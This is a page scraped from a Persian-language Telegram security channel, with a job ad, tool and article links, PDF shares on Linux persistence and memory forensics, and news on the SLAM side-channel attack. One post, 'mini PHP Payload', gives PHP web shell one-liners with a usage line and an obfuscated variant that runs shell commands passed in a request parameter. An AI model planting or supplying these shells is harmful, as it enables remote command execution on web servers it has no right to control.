Network Security Channel – Telegram
Network Security Channel
2.55K subscribers
5.33K photos
3.42K videos
5.56K files
4.44K links
شروع از سال 1395
Security Operation Center (SOC)
Bug Bounty
Vulnerability
Pentest
Hardening
Linux
Reasearch
Security Network
Security Researcher
DevSecOps
Blue Team
Red Team
Download Telegram
سلام
یک شرکت معتبر در حوزه نفت و گاز با تخصص های زیر، در حال جذب نیرو می باشد.

- مجازی سازی در حد متوسط/مسلط
- تسلط به سرویس های اکتیو دایرکتوری (ترجیحا MCSE)
-تسلط بر  Microsoft Exchange Server
- مسلط به نرم افزار Veeam B&R
- آشنا با نرم افزارهای مانیتورینگ شبکه
- آشنا به ذخیره سازهای تحت شبکه

محدوده کاری: غرب تهران
ساعات کاری: 7:30 الی 16:15 (با 1 ساعت شناوری)
مدرک مورد نیاز: حداقل لیسانس

لطفا رزومه مورد نظر ارسال شود

https://news.1rj.ru/str/Imanakramii

@Engineer_Computer
👍1
⭕️ اگر در حوزه تست نفوذ یا لایه دفاعی Active Directory فعالیت میکنید مدتی پیش تکنیکی برای DNS Spoofing با استفاده از Abuse کردن DHCP کشف شد که این اسکریپت قابلیت کشف MissConfig های این تکنیک را دارد.
از MissConfig های کشف شده در بخش های مختلف را میتوان مثال زد:
‏DNS Credential
‏Name Protection
‏DNSUpdateProxy
‏Weak record ACLs

https://github.com/akamai/Invoke-DHCPCheckup
#RedTeam #Hardening

@Engineer_Computer
آموزش ادیتور #VIM به صورت تعاملی با وبسایت https://openvim.com/
@Engineer_Computer
بخوانیم

دستنوشته های یک مهندس کشف

به فرآیند کشف دقت کنید و ببینید همکاری و استفاده از منابع مختلف در طول پروسه کشف چقدر موثر است

https://redcanary.com/blog/bitsadmin/?utm_source=linkedin&utm_medium=social

@Engineer_Computer
The Art of Linux Persistence .pdf
6.9 MB
هکر ها چطور در لینوکس دسترسی خود را ماندگار می‌کنند
@Engineer_Computer
🗒 mini PHP Payload

*
<?=$_GET[0]?>
<?=$_POST[0]?>
<?={$_REQUEST['_']}?>
*
Us
age :
Target.com/path/to/shell.php?0=command
*
Obfuscation :
<?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo
`$_`?>

@Engineer_Computer
ChatGPT for Cybersecurity #4.pdf
2.4 MB
🗒 ChatGPT for Cybersecurity
-|Part 4
قسمت چهارم مقاله ی چت جی پی تی


@Engineer_Computer
رمز نگاری منحنی و بیضوی | Elliptic Curve Cryptography

مترجم: میلاد سقایت

دانلود از سایت academia: کلیک کنید
@Engineer_Computer
Volatility Commands for Basic Malware Analysis.pdf
351.2 KB
دستورات Volatility برای تحلیل بد افزار در حافظه

@Engineer_Computer
یه رایتاپ نچندان فنی ولی جذاب برای مایندست یه هانتر:

https://nmochea.medium.com/a-million-journey-f02df23a2ae7

@Engineer_Computer
⭕️ محققان دانشگاه Vrije در آمستردام هلند یک حمله Side-Channel جدید به نام SLAM را کشف کرده‌اند که می‌تواند برای نشت اطلاعات حساس از حافظه کرنل در CPU های فعلی و آینده ی ‏ Intel , AMD و ARM مورد سوء استفاده قرار گیرد.
این حمله یک اکسپلویت از سری حملات Spectre است که بر اساس یک ویژگی جدید در CPU های Intel به نام Linear Address Making (LAM) و همچنین مشابه آن از AMD (به نام Upper Address Ignore یا UAI) و Arm (به نام Top Byte Ignore) است. یا TBI) نیز نامگذاری شده است.
محققان گفتند SLAM به ما اجازه می دهد تا داده‌های کرنل ASCII دلخواه را به بیرون بکشیم و می‌توان از آن برای افشای Hash رمز عبور Root در عرض چند دقیقه از حافظه کرنل استفاده کرد.
این در حالی است که LAM به عنوان یک ویژگی امنیتی ارائه می شود، این مطالعه نشان داده که امنیت را کاهش می دهد و به طور چشمگیری سطح حمله Spectre را افزایش می دهد که منجر به این حمله میشود که از اجرای حدس و گمان برای استخراج داده های حساس از طریق یک Cache Covert Channel سوء استفاده می کند.
‏Intel در مستندات خود می گوید این حمله از اثرات جانبی ریزمعماری دستورالعمل های گذرا سوء است

@Engineer_Computer